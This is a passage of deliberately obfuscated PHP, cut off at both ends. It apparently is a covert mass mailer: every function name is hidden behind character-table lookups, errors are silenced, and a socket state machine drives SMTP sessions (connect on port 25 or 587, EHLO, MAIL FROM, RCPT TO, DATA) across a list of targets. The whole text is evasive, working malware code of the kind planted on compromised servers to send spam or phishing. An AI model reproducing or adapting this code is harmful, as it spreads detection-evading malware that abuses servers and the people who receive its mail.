$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[87].$r76[24].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24]; $GLOBALS['fmlld76'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[49].$r76[41].$r76[87].$r76[53].$r76[49].$r76[58]; $GLOBALS['zwafy86'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[58].$r76[49].$r76[58].$r76[96].$r76[5].$r76[49].$r76[27].$r76[29]; $GLOBALS['uocvp26'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[49].$r76[58].$r76[58].$r76[94].$r76[27].$r76[87]; $GLOBALS['xvxof76'] = $r76[7].$r76[66].$r76[49].$r76[27].$r76[29].$r76[49].$r76[41].$r76[94].$r76[58]; $GLOBALS['vzqix48'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[96].$r76[5].$r76[49].$r76[27].$r76[29].$r76[53].$r76[58].$r76[61]; $GLOBALS['sltum36'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94].$r76[49].$r76[45].$r76[87]; $GLOBALS['clkxn20'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[53].$r76[94].$r76[58].$r76[87]; $GLOBALS['unkvq75'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[49].$r76[66].$r76[94]; $GLOBALS['yoxhh65'] = $r76[7].$r76[27].$r76[5].$r76[49].$r76[66].$r76[94]; $GLOBALS['dskbo69'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[24].$r76[94].$r76[90].$r76[95]; $GLOBALS['jhtbn88'] = $r76[7].$r76[94].$r76[49].$r76[7]; $GLOBALS['zflfl64'] = $r76[7].$r76[24].$r76[94].$r76[90].$r76[95]; $GLOBALS['uwnpx27'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94]; $GLOBALS['stdvp96'] = $r76[7].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94]; $GLOBALS['ocmvf65'] = $r76[24].$r76[90].$r76[58].$r76[95]; $GLOBALS['bkenc7'] = $r76[94].$r76[20].$r76[41].$r76[5].$r76[49].$r76[95].$r76[94]; $GLOBALS['llpxl21'] = $r76[41].$r76[90].$r76[27].$r76[29]; $GLOBALS['efljc33'] = $r76[45].$r76[58].$r76[41].$r76[90].$r76[27].$r76[29]; $GLOBALS['zndda55'] = $r76[27].$r76[61].$r76[35].$r76[36].$r76[61].$r76[14]; $GLOBALS['lzlla40'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[78].$r76[94].$r76[24].$r76[61].$r76[94]; $GLOBALS['axqrn63'] = $r76[5].$r76[49].$r76[58].$r76[61].$r76[46].$r76[53].$r76[41]; @$GLOBALS['vtton6'](NULL); @$GLOBALS['jlxru64']($r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[5].$r76[49].$r76[61],NULL); @$GLOBALS['jlxru64']($r76[5].$r76[49].$r76[61].$r76[54].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[66],0); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32], 0x000F); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[4] , 0x0001); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[55], 0x0002); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56] , 1); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[56].$r76[55].$r76[82].$r76[79].$r76[68] , 2); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[44].$r76[67].$r76[22].$r76[17].$r76[68].$r76[64].$r76[67].$r76[34] , 3); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71], 4); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67] , 1); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67], 2); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11] , 4); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17] , 5); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3] , 1); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3] , 2); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67] , 0); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6] , 1); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17] , 2); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11] , 3); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17] , 4); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4] , 5); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34] , 6); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67] , 7); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[11].$r76[3].$r76[71].$r76[79].$r76[67].$r76[79].$r76[6] , 8); $GLOBALS['qobdl72']($r76, NULL); $jabhi9 = array($r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87] => "", $r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58] => "", $r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94] => "", $r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5] => "", $r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5] => "", $r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78] => ""); if (FALSE == $GLOBALS['yhrfr40']($r76, $jabhi9)) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](0987654321).$r76[80].$r76[52].$r76[76].$r76[80].$r76[1].$r76[1].$r76[9].$r76[9].$r76[30]; exit; } $iwule39 = array(); for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]]); $afses42++) { $kumlm43 = array( $r76[53].$r76[95] => $afses42, $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80] => "", $r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49] => "", $r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87] => "", $r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87] => "", $r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69] => "", $r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87] => "", $r76[61].$r76[54].$r76[7].$r76[7].$r76[7] => FALSE, $r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => "", $r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => "", $r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87] => "", $r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24] => FALSE, $r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29] => FALSE, $r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94] => $GLOBALS['kyioa8'](), $r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41] => $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]), $r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87] => 25, $r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58] => "", $r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87] => "", $r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61] => FALSE, $r76[5].$r76[54].$r76[94].$r76[24].$r76[24] => "", $r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94] => FALSE, $r76[5].$r76[54].$r76[43].$r76[90].$r76[69] => 0, $r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41] => FALSE, $r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95] => FALSE, ); if (FALSE == $GLOBALS['nhnww15']($r76, $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]][$afses42], $jabhi9, $kumlm43)) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](1111111111).$r76[80].$r76[52].$r76[46].$r76[80].$r76[1].$r76[1].$GLOBALS['igajs32']($r76, $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]][$afses42]).$r76[9].$r76[9].$r76[30]; continue; } $iwule39[] = $kumlm43; } $GLOBALS['cpukq94']($r76, $iwule39); $GLOBALS['bdonk12']($r76, $iwule39); $GLOBALS['aurku4']($r76, $iwule39); exit; function ioxgo29($r76, $iwule39) { $hwrbl25 = 0; $spjea96 = ""; for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($iwule39); $afses42++) { if ($iwule39[$afses42][$r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41]] == TRUE) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](2222222222).$r76[80].$r76[52].$r76[85].$r76[80].$r76[1].$r76[1].$GLOBALS['igajs32']($r76, $iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[39].$r76[74].$r76[74].$r76[39].$iwule39[$afses42][$r76[5].$r76[54].$r76[94].$r76[24].$r76[24]]).$r76[9].$r76[9].$r76[30]; } if ($iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] == TRUE) { $spjea96.= $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]]; $hwrbl25++; } } if ($hwrbl25 == 0) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](0987654321).$r76[80].$r76[52].$r76[85].$r76[80].$r76[1].$r76[1].$r76[9].$r76[9].$r76[30]; } else { echo $r76[17].$r76[19].$r76[80].$GLOBALS['quzii24'](1234567890).$r76[80].$hwrbl25.$r76[80].$GLOBALS['tlyiy12']($iwule39).$r76[86].$r76[1].$spjea96.$r76[9].$r76[30]; } } function hwgbo88($r76, &$iwule39) { if (!$GLOBALS['yqqkt30']($r76[78].$r76[90].$r76[53].$r76[5])) { return FALSE; } for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($iwule39); $afses42++) { if ($iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] == TRUE) { continue; } if ($iwule39[$afses42][$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]]) { if (@$GLOBALS['tnmsd36']($iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]], $iwule39[$afses42][$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]], $iwule39[$afses42][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]], $iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]].$iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]], $r76[26].$r76[7].$iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]])) { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 2; } else { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = FALSE; } } else { if (@$GLOBALS['tnmsd36']($iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]], $iwule39[$afses42][$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]], $iwule39[$afses42][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]], $iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]])) { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 2; } else { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = FALSE; } } } } function omauf87($r76, &$iwule39) { while ($GLOBALS['chqql44']($r76, $iwule39)) { $GLOBALS['cvtxr40']($r76, $iwule39); $GLOBALS['eavur97'](25000); } } function urvfu78($r76, &$iwule39, $xhovg5, $flunj82, $mavcb77) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] != FALSE) { $GLOBALS['xcnkh30']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]); } $iwule39[$xhovg5][$r76[5].$r76[54].$r76[94].$r76[24].$r76[24]] = $r76[1].$iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]].$r76[9].$GLOBALS['wnlxd28']($GLOBALS['laepm94']($r76[16].$r76[21].$r76[30].$r76[16], $r76[39], $flunj82)); $iwule39[$xhovg5][$r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41]] = $mavcb77; $iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] = TRUE; return; } function ecyws30($r76, &$iwule39) { $oonnt88 = $GLOBALS['kyioa8'](); foreach($iwule39 as $xhovg5=>$kumlm43) { if ($kumlm43[$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] == TRUE) { continue; } if ($kumlm43[$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] + 20 < $oonnt88) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] == $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]) && $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]] != 587) { $GLOBALS['xcnkh30']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]] = 587; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); continue; } $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $r76[87].$r76[53].$r76[78].$r76[94].$r76[49].$r76[45].$r76[87], FALSE); continue; } switch($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]]) { case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]): if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]] == FALSE) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]] = @$GLOBALS['nxseo15']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87]]); if (!@$GLOBALS['cyzbs96']($r76[16].$r76[83].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[72].$r76[76].$r76[33].$r76[31].$r76[10].$r76[42].$r76[86].$r76[97].$r76[62].$r76[72].$r76[85].$r76[10].$r76[16], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]])) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $r76[24].$r76[94].$r76[66].$r76[49].$r76[5].$r76[70].$r76[94].$r76[39].$r76[78].$r76[20], FALSE); break; } } $kdidw81 = 0; $msnsv40 = ''; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] = $GLOBALS['yoejz48']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3]), $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]], 2, $kdidw81, $msnsv40, TRUE); if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == FALSE) { break; } if ($kdidw81 == 0 || $kdidw81 === 56 || $kdidw81 === 10056 ) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6]); $GLOBALS['lzjpr73']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], 15); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6]): if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[79].$r76[22].$r76[71].$r76[17].$r76[39].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[11].$r76[4].$r76[64].$r76[71].$r76[39].$r76[0].$r76[68].$r76[17].$r76[11].$r76[74].$r76[2].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[38].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[68].$r76[40].$r76[3].$r76[67].$r76[39].$r76[67].$r76[17].$r76[74].$r76[2].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[38].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250 && substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 251) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[6].$r76[4].$r76[67].$r76[4].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 354) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $iwule39[$xhovg5][$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]].$r76[21].$r76[30].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]].$r76[21].$r76[30].$r76[86].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = 